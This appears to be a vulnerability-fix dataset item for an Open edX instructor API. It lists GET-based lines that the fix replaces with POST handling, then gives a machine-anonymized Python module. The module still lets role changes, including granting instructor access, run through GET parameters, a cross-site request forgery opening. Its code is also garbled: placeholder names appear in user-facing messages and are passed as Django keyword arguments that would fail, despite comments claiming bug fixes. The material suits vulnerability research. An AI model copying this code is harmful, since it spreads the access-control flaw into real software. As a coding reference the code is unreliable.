" 'unique_student_identifier': request.GET.get('unique_student_identifier'),",
" rolename = request.GET.get('rolename')",
" action = request.GET.get('action')",
"@require_query_params(rolename=\"'instructor', 'staff', or 'beta'\")",
" rolename = request.GET.get('rolename')",
" problem_location = request.GET.get('problem_location', '')",
"@require_query_params(",
" user = get_student_from_identifier(request.GET.get('unique_student_identifier'))",
"@require_query_params(",
" problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))",
" student_identifier = request.GET.get('unique_student_identifier', None)",
" all_students = request.GET.get('all_students', False) in ['true', 'True', True]",
" delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]",
" student_identifier = request.GET.get('unique_student_identifier', None)",
" all_students = request.GET.get('all_students', False) in ['true', 'True', True]",
" delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]",
"@require_query_params(problem_to_reset=\"problem urlname to reset\")",
" problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))",
" student_identifier = request.GET.get('unique_student_identifier', None)",
" all_students = request.GET.get('all_students') in ['true', 'True', True]",
" student_identifier = request.GET.get('unique_student_identifier', None)",
" all_students = request.GET.get('all_students') in ['true', 'True', True]",
" problem_location_str = strip_if_string(request.GET.get('problem_location_str', False))",
" student = request.GET.get('unique_student_identifier', None)",
" student = request.GET.get('unique_student_identifier', None)",
"@require_query_params('rolename')",
" rolename = request.GET.get('rolename')",
"@require_query_params(",
" unique_student_identifier = request.GET.get('unique_student_identifier')",
" rolename = request.GET.get('rolename')",
" action = request.GET.get('action')",
"@require_query_params('student', 'url', 'due_datetime')",
" student = require_student_from_identifier(request.GET.get('student'))",
" unit = find_unit(course, request.GET.get('url'))",
" due_date = parse_datetime(request.GET.get('due_datetime'))",
"@require_query_params('student', 'url')",
" student = require_student_from_identifier(request.GET.get('student'))",
" unit = find_unit(course, request.GET.get('url'))",
"@require_query_params('url')",
" unit = find_unit(course, request.GET.get('url'))",
"@require_query_params('student')",
" student = require_student_from_identifier(request.GET.get('student'))",
"@csrf_exempt"
],
"line_no": [
143,
145,
148,
150,
152,
153,
154,
159,
161,
162,
163,
164,
165,
167,
168,
169,
170,
171,
173,
174,
175,
176,
177,
178,
187,
855,
877,
880,
895,
896,
934,
959,
999,
1908,
1922,
1937,
1964,
1965,
1969,
1970,
2052,
2056,
2057,
2091,
2106,
2107,
2112,
2164,
2169,
2246,
2247,
2290,
2426,
2445,
2545,
2572,
2573,
2574,
2635,
2641,
2642,
2643,
2656,
2662,
2663,
2682,
2688,
2696,
2702,
3079
]
} | {
"code": [
" `kwargs` is a **dict of required POST parameter names",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_post_params(",
" user = get_student_from_identifier(request.POST.get('unique_student_identifier'))",
" 'unique_student_identifier': request.POST.get('unique_student_identifier'),",
" action = request.POST.get('action')",
"@require_POST",
" rolename = request.POST.get('rolename')",
" problem_location = request.POST.get('problem_location', '')",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_post_params(",
" Takes query parameter unique_student_identifier and if the student exists",
" user = get_student_from_identifier(request.POST.get('unique_student_identifier'))",
"@require_POST",
" problem_to_reset = strip_if_string(request.POST.get('problem_to_reset'))",
" all_students = request.POST.get('all_students', False) in ['true', 'True', True]",
"@require_POST",
" all_students = request.POST.get('all_students', False) in ['true', 'True', True]",
"@require_POST",
"@require_post_params(problem_to_reset=\"problem urlname to reset\")",
" student_identifier = request.POST.get('unique_student_identifier', None)",
" all_students = request.POST.get('all_students') in ['true', 'True', True]",
"@require_POST",
" student_identifier = request.POST.get('unique_student_identifier', None)",
"@require_POST",
"@require_POST",
"@require_POST",
" student = request.POST.get('unique_student_identifier', None)",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_POST",
"@require_post_params('rolename')",
"@require_POST",
"@require_post_params(",
" unique_student_identifier = request.POST.get('unique_student_identifier')",
" rolename = request.POST.get('rolename')",
" action = request.POST.get('action')",
"@require_POST",
" student = require_student_from_identifier(request.POST.get('student'))",
" unit = find_unit(course, request.POST.get('url'))",
"@require_POST",
" student = require_student_from_identifier(request.POST.get('student'))",
"@require_POST",
"@require_post_params('url')",
"@require_POST",
"@require_post_params('student')"
],
"line_no": [
149,
280,
571,
817,
822,
844,
847,
863,
898,
927,
968,
1196,
1289,
1397,
1448,
1473,
1880,
1885,
1893,
1899,
1911,
1942,
1947,
2000,
2035,
2067,
2071,
2087,
2092,
2124,
2145,
2177,
2196,
2215,
2231,
2261,
2296,
2338,
2364,
2386,
2413,
2417,
2477,
2538,
2565,
2566,
2567,
2625,
2635,
2636,
2647,
2657,
2674,
2678,
2689,
2693
]
} |
# Standard library
# NOTE(review): two lines in the original were syntactically invalid
# ("import .logging" and "import .csv"); corrected to plain stdlib imports.
# Every original import is preserved, regrouped stdlib / third-party / project.
import StringIO
import csv
import decimal
import json
import logging
import random
import re
import string
import time

# Third-party
import unicodecsv
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError, PermissionDenied
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail.message import EmailMessage
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.db import IntegrityError, transaction
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound
from django.shortcuts import redirect
from django.utils.html import strip_tags
from django.utils.translation import ugettext as _
from django.views.decorators.cache import cache_control
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_exempt
from django.views.decorators.http import require_POST, require_http_methods
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey, UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey

# Project / platform
import instructor.enrollment as enrollment
import instructor_analytics.basic
import instructor_analytics.csvs
import instructor_analytics.distributions
import instructor_task.api
from VAR_40 import auth
from VAR_40.models import (
    CourseEnrollment, unique_id_for_user, anonymous_id_for_user,
    UserProfile, Registration, EntranceExamConfiguration,
    ManualEnrollmentAudit, UNENROLLED_TO_ALLOWEDTOENROLL, ALLOWEDTOENROLL_TO_ENROLLED,
    ENROLLED_TO_ENROLLED, ENROLLED_TO_UNENROLLED, UNENROLLED_TO_ENROLLED,
    UNENROLLED_TO_UNENROLLED, ALLOWEDTOENROLL_TO_UNENROLLED, DEFAULT_TRANSITION_STATE
)
from VAR_40.models import get_user_by_username_or_email
from VAR_40.roles import GlobalStaff, CourseSalesAdminRole, CourseFinanceAdminRole
from bulk_email.models import CourseEmail, BulkEmailFlag
from certificates import api as certs_api
from certificates.models import CertificateWhitelist, GeneratedCertificate, CertificateStatuses, CertificateInvalidation
from courseware.access import has_access
from courseware.courses import get_course_with_access, get_course_by_id
from courseware.models import StudentModule
from django_comment_client.utils import has_forum_access
from django_comment_common.models import (
    Role,
    FORUM_ROLE_ADMINISTRATOR,
    FORUM_ROLE_MODERATOR,
    FORUM_ROLE_COMMUNITY_TA,
)
from edxmako.shortcuts import render_to_string
from instructor.access import list_with_level, allow_access, revoke_access, ROLES, update_forum_role
from instructor.enrollment import (
    get_user_email_language,
    enroll_email,
    send_mail_to_student,
    get_email_params,
    send_beta_role_email,
    unenroll_email,
)
from instructor.views import INVOICE_KEY
from instructor.views.instructor_task_helpers import extract_email_features, extract_task_features
from instructor_task.api_helper import AlreadyRunningError
from instructor_task.models import ReportStore
from microsite_configuration import microsite
from openedx.core.djangoapps.course_groups.cohorts import is_course_cohorted
from openedx.core.djangoapps.theming import helpers as theming_helpers
from openedx.core.djangoapps.user_api.preferences.api import get_user_preference, set_user_preference
from openedx.core.djangolib.markup import HTML, Text
from shoppingcart.models import (
    Coupon,
    CourseRegistrationCode,
    RegistrationCodeRedemption,
    Invoice,
    CourseMode,
    CourseRegistrationCodeInvoiceItem,
)
from submissions import api as sub_api  # installed from the edx-submissions repository
from util.file import (
    store_uploaded_file, course_and_time_based_filename_generator,
    FileValidationException, UniversalNewlineIterator
)
from util.json_request import JsonResponse, JsonResponseBadRequest
from .tools import (
    dump_student_extensions,
    dump_module_extensions,
    find_unit,
    get_student_from_identifier,
    require_student_from_identifier,
    handle_dashboard_error,
    parse_datetime,
    set_due_date_extension,
    strip_if_string,
)
# Module-level logger used by all view helpers below.
VAR_0 = logging.getLogger(__name__)
def FUNC_0(VAR_1):
    """
    Decorator: translate common exceptions raised by a view into 400
    responses — JSON for AJAX/JSON-accepting callers, plain text otherwise.

    Handles User.DoesNotExist and AlreadyRunningError.
    """
    def FUNC_83(VAR_9, *VAR_2, **VAR_3):  # pylint: disable=missing-docstring
        # JSON is expected for XHR requests or an explicit JSON Accept header.
        VAR_164 = VAR_9.is_ajax() or VAR_9.META.get("HTTP_ACCEPT", "").startswith("application/json")

        def _as_400(msg):
            # Shape the 400 response to match what the caller accepts.
            if VAR_164:
                return JsonResponse({"error": msg}, 400)
            return HttpResponseBadRequest(msg)

        try:
            return VAR_1(VAR_9, *VAR_2, **VAR_3)
        except User.DoesNotExist:
            return _as_400(_("User does not exist."))
        except AlreadyRunningError:
            return _as_400(_("Task is already running."))
    return FUNC_83
def FUNC_1(*VAR_2, **VAR_3):
    """
    Decorator factory: require the listed GET query parameters.

    Positional args are parameter names; keyword args map a parameter name to
    a help string included in the error payload.  When any parameter is
    missing, responds 400 with JSON listing the absent parameters.
    """
    VAR_47 = []
    VAR_47 += [(arg, None) for arg in VAR_2]
    VAR_47 += [(VAR_160, VAR_3[VAR_160]) for VAR_160 in VAR_3]

    def FUNC_84(VAR_1):  # pylint: disable=missing-docstring
        def FUNC_83(*VAR_2, **VAR_3):  # pylint: disable=missing-docstring
            VAR_9 = VAR_2[0]
            VAR_193 = {
                'error': 'Missing required query parameter(s)',
                'parameters': [],
                'info': {},
            }
            for (VAR_209, extra) in VAR_47:
                # Fresh sentinel object: distinguishes "absent" from any real value.
                VAR_199 = object()
                # BUG FIX: the original compared against the undefined name
                # `default` (NameError); the intended check is against the sentinel.
                if VAR_9.GET.get(VAR_209, VAR_199) is VAR_199:
                    VAR_193['parameters'].append(VAR_209)
                    VAR_193['info'][VAR_209] = extra
            if len(VAR_193['parameters']) > 0:
                return JsonResponse(VAR_193, status=400)
            else:
                return VAR_1(*VAR_2, **VAR_3)
        return FUNC_83
    return FUNC_84
def FUNC_2(*VAR_2, **VAR_3):
    """
    Decorator factory: require the listed POST parameters.

    Positional args are parameter names; keyword args map a parameter name to
    a help string included in the error payload.  When any parameter is
    missing, responds 400 with JSON listing the absent parameters.
    """
    VAR_47 = []
    VAR_47 += [(arg, None) for arg in VAR_2]
    VAR_47 += [(VAR_160, VAR_3[VAR_160]) for VAR_160 in VAR_3]

    def FUNC_84(VAR_1):  # pylint: disable=missing-docstring
        def FUNC_83(*VAR_2, **VAR_3):  # pylint: disable=missing-docstring
            VAR_9 = VAR_2[0]
            VAR_193 = {
                'error': 'Missing required query parameter(s)',
                'parameters': [],
                'info': {},
            }
            for (VAR_209, extra) in VAR_47:
                # Fresh sentinel object: distinguishes "absent" from any real value.
                VAR_199 = object()
                # BUG FIX: the original compared against the undefined name
                # `default` (NameError); the intended check is against the sentinel.
                if VAR_9.POST.get(VAR_209, VAR_199) is VAR_199:
                    VAR_193['parameters'].append(VAR_209)
                    VAR_193['info'][VAR_209] = extra
            if len(VAR_193['parameters']) > 0:
                return JsonResponse(VAR_193, status=400)
            else:
                return VAR_1(*VAR_2, **VAR_3)
        return FUNC_83
    return FUNC_84
def FUNC_3(VAR_4):
    """
    Decorator factory: require course-level access ('instructor' or 'staff')
    on the course named by the view's `course_id` kwarg; 403 otherwise.

    Raises ValueError immediately for an unrecognized level.
    """
    if VAR_4 not in ['instructor', 'staff']:
        raise ValueError("unrecognized VAR_4 '{}'".format(VAR_4))

    def FUNC_84(VAR_1):  # pylint: disable=missing-docstring
        def FUNC_83(*VAR_2, **VAR_3):  # pylint: disable=missing-docstring
            VAR_9 = VAR_2[0]
            VAR_65 = get_course_by_id(CourseKey.from_string(VAR_3['course_id']))
            # Guard clause: reject before ever invoking the wrapped view.
            if not has_access(VAR_9.user, VAR_4, VAR_65):
                return HttpResponseForbidden()
            return VAR_1(*VAR_2, **VAR_3)
        return FUNC_83
    return FUNC_84
def FUNC_4(VAR_1):
    """
    Decorator: allow only global platform staff; everyone else gets a 403
    explaining the requirement.
    """
    def FUNC_83(VAR_9, *VAR_2, **VAR_3):  # pylint: disable=missing-docstring
        if not GlobalStaff().has_user(VAR_9.user):
            return HttpResponseForbidden(
                u"Must be {platform_name} staff to perform this VAR_57.".format(
                    platform_name=settings.PLATFORM_NAME
                )
            )
        return VAR_1(VAR_9, *VAR_2, **VAR_3)
    return FUNC_83
def FUNC_5(VAR_1):
    """
    Decorator: restrict a (request, course_id) view to course sales admins.

    404 when the course id cannot be parsed; 403 when the role check fails.
    """
    def FUNC_83(VAR_9, VAR_10):  # pylint: disable=missing-docstring
        try:
            VAR_38 = CourseKey.from_string(VAR_10)
        except InvalidKeyError:
            VAR_0.error(u"Unable to find VAR_65 with VAR_65 VAR_160 %s", VAR_10)
            return HttpResponseNotFound()
        if auth.user_has_role(VAR_9.user, CourseSalesAdminRole(VAR_38)):
            return VAR_1(VAR_9, VAR_10)
        return HttpResponseForbidden()
    return FUNC_83
def FUNC_6(VAR_1):
    """
    Decorator: restrict a (request, course_id) view to course finance admins.

    404 when the course id cannot be parsed; 403 when the role check fails.
    """
    def FUNC_83(VAR_9, VAR_10):  # pylint: disable=missing-docstring
        try:
            VAR_38 = CourseKey.from_string(VAR_10)
        except InvalidKeyError:
            VAR_0.error(u"Unable to find VAR_65 with VAR_65 VAR_160 %s", VAR_10)
            return HttpResponseNotFound()
        if auth.user_has_role(VAR_9.user, CourseFinanceAdminRole(VAR_38)):
            return VAR_1(VAR_9, VAR_10)
        return HttpResponseForbidden()
    return FUNC_83
# Column indexes for rows of the auto-enrollment CSV consumed by FUNC_7:
# the row layout is [email, username, full name, country] (see the
# VAR_40[VAR_5..VAR_8] reads inside FUNC_7).
VAR_5 = 0
VAR_6 = 1
VAR_7 = 2
VAR_8 = 3
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_7(VAR_9, VAR_10):  # pylint: disable=too-many-statements
    """
    Create and enroll the students listed in an uploaded CSV file.

    The uploaded file (request file 'students_list') must contain rows of
    exactly four columns: email, username, full name, country.  Existing
    accounts are enrolled directly; new accounts are created with a
    generated password and notified by email.

    Returns JSON with 'row_errors', 'general_errors' and 'warnings'.
    """
    if not microsite.get_value('ALLOW_AUTOMATED_SIGNUPS', settings.FEATURES.get('ALLOW_AUTOMATED_SIGNUPS', False)):
        return HttpResponseForbidden()
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_48 = []  # warnings (e.g. email exists under a different username)
    VAR_49 = []  # per-row errors
    VAR_50 = []  # file-level errors
    # White-label courses enroll in the default shopping-cart mode.
    if CourseMode.is_white_label(VAR_10):
        VAR_24 = CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG
    else:
        VAR_24 = None
    if 'students_list' in VAR_9.FILES:
        VAR_125 = []
        try:
            VAR_194 = VAR_9.FILES.get('students_list')
            if VAR_194.name.endswith('.csv'):
                # BUG FIX: rows were read via the undefined name `VAR_26`;
                # use the stdlib csv module.
                VAR_125 = [row for row in csv.reader(VAR_194.read().splitlines())]
                VAR_65 = get_course_by_id(VAR_10)
            else:
                VAR_50.append({
                    'username': '', 'email': '',
                    'response': _('Make sure that the file you upload is in CSV format with no extraneous characters or VAR_124.')
                })
        except Exception:  # pylint: disable=broad-except
            VAR_50.append({
                'username': '', 'email': '', 'response': _('Could not read uploaded file.')
            })
        finally:
            VAR_194.close()
        VAR_12 = []  # generated passwords; FUNC_9 keeps them unique
        VAR_166 = 0  # 1-based row counter used in error messages
        for VAR_40 in VAR_125:
            # BUG FIX: the counter incremented the undefined name `row_num`.
            VAR_166 = VAR_166 + 1
            if len(VAR_40) != 4:
                if len(VAR_40) > 0:
                    VAR_49.append({
                        'username': '',
                        'email': '',
                        'response': _('Data in row #{VAR_166} must have exactly four columns: VAR_14, VAR_15, full VAR_16, and country').format(VAR_166=VAR_166)
                    })
                continue
            VAR_14 = VAR_40[VAR_5]
            VAR_15 = VAR_40[VAR_6]
            VAR_16 = VAR_40[VAR_7]
            VAR_17 = VAR_40[VAR_8][:2]  # two-letter country code
            VAR_25 = get_email_params(VAR_65, True, VAR_168=VAR_9.is_secure())
            try:
                validate_email(VAR_14)  # Raises ValidationError if invalid
            except ValidationError:
                VAR_49.append({
                    'username': VAR_15, 'email': VAR_14, 'response': _('Invalid VAR_14 {email_address}.').format(email_address=VAR_14)})
            else:
                # BUG FIX: the lookups and format calls below referenced the
                # undefined names `email`/`username`; use the row's values.
                if User.objects.filter(VAR_14=VAR_14).exists():
                    VAR_19 = User.objects.get(VAR_14=VAR_14)
                    if not User.objects.filter(VAR_14=VAR_14, VAR_15=VAR_15).exists():
                        VAR_211 = _(
                            'An account with VAR_14 {email} exists but the provided VAR_15 {VAR_15} '
                            'is different. Enrolling anyway with {VAR_14}.'
                        ).format(VAR_14=VAR_14, VAR_15=VAR_15)
                        VAR_48.append({
                            'username': VAR_15, 'email': VAR_14, 'response': VAR_211
                        })
                        VAR_0.warning(u'email %s already exist', VAR_14)
                    else:
                        VAR_0.info(
                            u"user already exists with VAR_15 '%s' and VAR_14 '%s'",
                            VAR_15,
                            VAR_14
                        )
                    if not CourseEnrollment.is_enrolled(VAR_19, VAR_10):
                        # BUG FIX: keyword values referenced the undefined
                        # names `course_id` / `email_params`.
                        FUNC_11(
                            VAR_19=VAR_19,
                            VAR_10=VAR_10,
                            VAR_20=VAR_24,
                            VAR_21=VAR_9.user,
                            VAR_22='Enrolling via VAR_26 upload',
                            VAR_23=UNENROLLED_TO_ENROLLED,
                        )
                        enroll_email(VAR_10=VAR_10, student_email=VAR_14, VAR_60=True, VAR_61=True, VAR_25=VAR_25)
                else:
                    # New account: generate a unique password, create and enroll.
                    VAR_18 = FUNC_9(VAR_12)
                    VAR_56 = FUNC_12(
                        VAR_14, VAR_15, VAR_16, VAR_17, VAR_18, VAR_10, VAR_24, VAR_9.user, VAR_25
                    )
                    VAR_49.extend(VAR_56)
    else:
        VAR_50.append({
            'username': '', 'email': '', 'response': _('File is not attached.')
        })
    VAR_51 = {
        'row_errors': VAR_49,
        'general_errors': VAR_50,
        'warnings': VAR_48
    }
    return JsonResponse(VAR_51)
def FUNC_8(VAR_11):
    """
    Return a random string of length VAR_11 drawn from ASCII letters and
    digits, excluding easily-confused characters (vowels, '1', 'l').
    """
    VAR_52 = [
        char for char in string.ascii_uppercase + string.digits + string.ascii_lowercase
        if char not in 'aAeEiIoOuU1l'
    ]
    # FIX: `string.join(...)` is Python-2-only; ''.join works on both 2 and 3.
    return ''.join(random.choice(VAR_52) for _ in range(VAR_11))
def FUNC_9(VAR_12, VAR_13=12):
    """
    Generate a random password of length VAR_13 that does not already appear
    in VAR_12; record it in VAR_12 and return it.
    """
    while True:
        VAR_18 = FUNC_8(VAR_13)
        if VAR_18 not in VAR_12:
            break
    VAR_12.append(VAR_18)
    return VAR_18
def FUNC_10(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18):
    """
    Create a Django user with the given email/username/password, plus a
    Registration record and a UserProfile carrying name and country.

    Returns the created user.
    """
    VAR_19 = User.objects.create_user(VAR_15, VAR_14, VAR_18)
    VAR_53 = Registration()
    VAR_53.register(VAR_19)
    # BUG FIX: the profile was constructed with the undefined name `user`;
    # pass the user object created above.
    VAR_54 = UserProfile(VAR_19=VAR_19)
    VAR_54.name = VAR_16
    VAR_54.country = VAR_17
    VAR_54.save()
    return VAR_19
def FUNC_11(VAR_19, VAR_10, VAR_20, VAR_21, VAR_22, VAR_23):
    """
    Enroll the user in the course (mode VAR_20) and record a manual
    enrollment audit entry attributing the change to VAR_21.

    Returns the created enrollment.
    """
    # BUG FIX: the mode keyword referenced the undefined name `mode`.
    VAR_55 = CourseEnrollment.enroll(VAR_19, VAR_10, VAR_20=VAR_20)
    ManualEnrollmentAudit.create_manual_enrollment_audit(
        VAR_21, VAR_19.email, VAR_23, VAR_22, VAR_55
    )
    VAR_0.info(u'user %s enrolled in the VAR_65 %s', VAR_19.username, VAR_10)
    return VAR_55
def FUNC_12(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18, VAR_10, VAR_24, VAR_21, VAR_25):
    """
    Atomically create an account and enroll it in the course, then email the
    new user their credentials.

    Returns a list of per-row error dicts (empty when everything succeeded).
    """
    VAR_56 = list()
    try:
        with transaction.atomic():
            VAR_19 = FUNC_10(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18)
            # BUG FIX: keyword values referenced the undefined names
            # `course_id` / `enrolled_by`; use this function's parameters.
            FUNC_11(
                VAR_19=VAR_19,
                VAR_10=VAR_10,
                VAR_20=VAR_24,
                VAR_21=VAR_21,
                VAR_22='Enrolling via VAR_26 upload',
                VAR_23=UNENROLLED_TO_ENROLLED,
            )
    except IntegrityError:
        VAR_56.append({
            'username': VAR_15, 'email': VAR_14, 'response': _('Username {VAR_19} already exists.').format(VAR_19=VAR_15)
        })
    except Exception as ex:  # pylint: disable=broad-except
        VAR_0.exception(type(ex).__name__)
        VAR_56.append({
            'username': VAR_15, 'email': VAR_14, 'response': type(ex).__name__,
        })
    else:
        # Account + enrollment succeeded; best-effort credential email.
        try:
            VAR_25.update({
                'message': 'account_creation_and_enrollment',
                'email_address': VAR_14,
                'password': VAR_18,
                'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
            })
            send_mail_to_student(VAR_14, VAR_25)
        except Exception as ex:  # pylint: disable=broad-except
            VAR_0.exception(
                "Exception '{VAR_154}' raised while sending VAR_14 to new VAR_19.".format(VAR_154=type(ex).__name__)
            )
            VAR_56.append({
                'username': VAR_15,
                'email': VAR_14,
                'response':
                    # BUG FIX: the format call referenced the undefined name `email`.
                    _("Error '{VAR_169}' while sending VAR_14 to new VAR_19 (user VAR_14={email}). "
                      "Without the VAR_14 VAR_40 would not be able to login. "
                      "Please contact support for further information.").format(VAR_169=type(ex).__name__, VAR_14=VAR_14),
            })
        else:
            VAR_0.info(u'email sent to new VAR_149 VAR_19 at %s', VAR_14)
    return VAR_56
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_2(VAR_57="enroll or unenroll", VAR_59="stringified list of VAR_133 and/or usernames")
def FUNC_13(VAR_9, VAR_10):
    """
    Enroll or unenroll the students identified in the POST body.

    POST params: 'action' ('enroll'/'unenroll'), 'identifiers', plus optional
    'auto_enroll', 'email_students' and 'reason' flags.  White-label courses
    require a non-empty reason.  Returns JSON with before/after enrollment
    state per identifier.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_57 = VAR_9.POST.get('action')
    VAR_58 = VAR_9.POST.get('identifiers')
    VAR_59 = FUNC_64(VAR_58)
    VAR_60 = VAR_9.POST.get('auto_enroll') in ['true', 'True', True]
    VAR_61 = VAR_9.POST.get('email_students') in ['true', 'True', True]
    VAR_62 = CourseMode.is_white_label(VAR_10)
    VAR_22 = VAR_9.POST.get('reason')
    # Paid (white-label) courses demand an explicit reason for the change.
    if VAR_62:
        if not VAR_22:
            return JsonResponse(
                {
                    'action': VAR_57,
                    'results': [{'error': True}],
                    'auto_enroll': VAR_60,
                }, status=400)
    VAR_55 = None
    VAR_23 = DEFAULT_TRANSITION_STATE
    VAR_25 = {}
    if VAR_61:
        VAR_65 = get_course_by_id(VAR_10)
        VAR_25 = get_email_params(VAR_65, VAR_60, VAR_168=VAR_9.is_secure())
    VAR_51 = []
    for identifier in VAR_59:
        VAR_19 = None
        VAR_14 = None
        VAR_167 = None
        try:
            VAR_19 = get_student_from_identifier(identifier)
        except User.DoesNotExist:
            # Unknown identifier: treat it as a raw email address.
            VAR_14 = identifier
        else:
            VAR_14 = VAR_19.email
            VAR_167 = get_user_email_language(VAR_19)
        try:
            validate_email(VAR_14)  # Raises ValidationError if invalid
            if VAR_57 == 'enroll':
                # BUG FIX: language keyword referenced the undefined name
                # `language`; pass the value resolved above.
                VAR_200, VAR_201, VAR_55 = enroll_email(
                    VAR_10, VAR_14, VAR_60, VAR_61, VAR_25, VAR_167=VAR_167
                )
                VAR_202 = VAR_200.to_dict()['enrollment']
                VAR_203 = VAR_200.to_dict()['user']
                VAR_204 = VAR_200.to_dict()['allowed']
                VAR_205 = VAR_201.to_dict()['enrollment']
                VAR_206 = VAR_201.to_dict()['allowed']
                # Derive the audit transition state from before/after flags.
                if VAR_203:
                    if VAR_205:
                        if VAR_202:
                            VAR_23 = ENROLLED_TO_ENROLLED
                        else:
                            if VAR_204:
                                VAR_23 = ALLOWEDTOENROLL_TO_ENROLLED
                            else:
                                VAR_23 = UNENROLLED_TO_ENROLLED
                    else:
                        if VAR_206:
                            VAR_23 = UNENROLLED_TO_ALLOWEDTOENROLL
            elif VAR_57 == 'unenroll':
                # BUG FIX: same undefined `language` keyword value as above.
                VAR_200, VAR_201 = unenroll_email(
                    VAR_10, VAR_14, VAR_61, VAR_25, VAR_167=VAR_167
                )
                VAR_202 = VAR_200.to_dict()['enrollment']
                VAR_204 = VAR_200.to_dict()['allowed']
                VAR_55 = CourseEnrollment.get_enrollment(VAR_19, VAR_10)
                if VAR_202:
                    VAR_23 = ENROLLED_TO_UNENROLLED
                else:
                    if VAR_204:
                        VAR_23 = ALLOWEDTOENROLL_TO_UNENROLLED
                    else:
                        VAR_23 = UNENROLLED_TO_UNENROLLED
            else:
                return HttpResponseBadRequest(strip_tags(
                    "Unrecognized VAR_57 '{}'".format(VAR_57)
                ))
        except ValidationError:
            VAR_51.append({
                'identifier': identifier,
                'invalidIdentifier': True,
            })
        except Exception as exc:  # pylint: disable=broad-except
            VAR_0.exception(u"Error while #{}ing student")
            VAR_0.exception(exc)
            VAR_51.append({
                'identifier': identifier,
                'error': True,
            })
        else:
            ManualEnrollmentAudit.create_manual_enrollment_audit(
                VAR_9.user, VAR_14, VAR_23, VAR_22, VAR_55
            )
            VAR_51.append({
                'identifier': identifier,
                'before': VAR_200.to_dict(),
                'after': VAR_201.to_dict(),
            })
    VAR_63 = {
        'action': VAR_57,
        'results': VAR_51,
        'auto_enroll': VAR_60,
    }
    return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_0
@FUNC_2(
    VAR_59="stringified list of VAR_133 and/or usernames",
    VAR_57="add or remove",
)
def FUNC_14(VAR_9, VAR_10):
    """
    Add or remove beta-tester ('beta') access for the listed students,
    optionally emailing them and auto-enrolling them in the course.

    Returns JSON with a per-identifier error/userDoesNotExist record.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_57 = VAR_9.POST.get('action')
    VAR_58 = VAR_9.POST.get('identifiers')
    VAR_59 = FUNC_64(VAR_58)
    VAR_61 = VAR_9.POST.get('email_students') in ['true', 'True', True]
    VAR_60 = VAR_9.POST.get('auto_enroll') in ['true', 'True', True]
    VAR_51 = []
    VAR_64 = 'beta'
    VAR_65 = get_course_by_id(VAR_10)
    VAR_25 = {}
    if VAR_61:
        VAR_168 = VAR_9.is_secure()
        # BUG FIX: keyword values referenced the undefined names
        # `auto_enroll` / `secure`; use the locals computed above.
        VAR_25 = get_email_params(VAR_65, VAR_60=VAR_60, VAR_168=VAR_168)
    for identifier in VAR_59:
        try:
            VAR_169 = False
            VAR_195 = False
            VAR_19 = get_student_from_identifier(identifier)
            if VAR_57 == 'add':
                allow_access(VAR_65, VAR_19, VAR_64)
            elif VAR_57 == 'remove':
                revoke_access(VAR_65, VAR_19, VAR_64)
            else:
                return HttpResponseBadRequest(strip_tags(
                    "Unrecognized VAR_57 '{}'".format(VAR_57)
                ))
        except User.DoesNotExist:
            VAR_169 = True
            VAR_195 = True
        except Exception as exc:  # pylint: disable=broad-except
            VAR_0.exception(u"Error while #{}ing student")
            VAR_0.exception(exc)
            VAR_169 = True
        else:
            if VAR_61:
                send_beta_role_email(VAR_57, VAR_19, VAR_25)
            if VAR_60:
                if not CourseEnrollment.is_enrolled(VAR_19, VAR_10):
                    CourseEnrollment.enroll(VAR_19, VAR_10)
        finally:
            # Record an outcome for every identifier, even on early errors.
            VAR_51.append({
                'identifier': identifier,
                'error': VAR_169,
                'userDoesNotExist': VAR_195
            })
    VAR_63 = {
        'action': VAR_57,
        'results': VAR_51,
    }
    return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_0
@FUNC_1(
    VAR_141="email or VAR_15 of VAR_19 to change access",
    VAR_64="'instructor', 'staff', 'beta', or 'ccx_coach'",
    VAR_57="'allow' or 'revoke'"
)
def FUNC_15(VAR_9, VAR_10):
    """
    Allow or revoke a course-level role for one student.

    GET params: 'unique_student_identifier', 'rolename', 'action'.
    Unknown users, inactive users and instructor self-demotion are reported
    back as JSON without changing access; an unknown role is a 400.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_with_access(
        VAR_9.user, 'instructor', VAR_10, depth=None
    )
    try:
        VAR_19 = get_student_from_identifier(VAR_9.GET.get('unique_student_identifier'))
    except User.DoesNotExist:
        VAR_63 = {
            'unique_student_identifier': VAR_9.GET.get('unique_student_identifier'),
            'userDoesNotExist': True,
        }
        return JsonResponse(VAR_63)
    # Refuse to grant roles to accounts that never activated.
    if not VAR_19.is_active:
        VAR_63 = {
            'unique_student_identifier': VAR_19.username,
            'inactiveUser': True,
        }
        return JsonResponse(VAR_63)
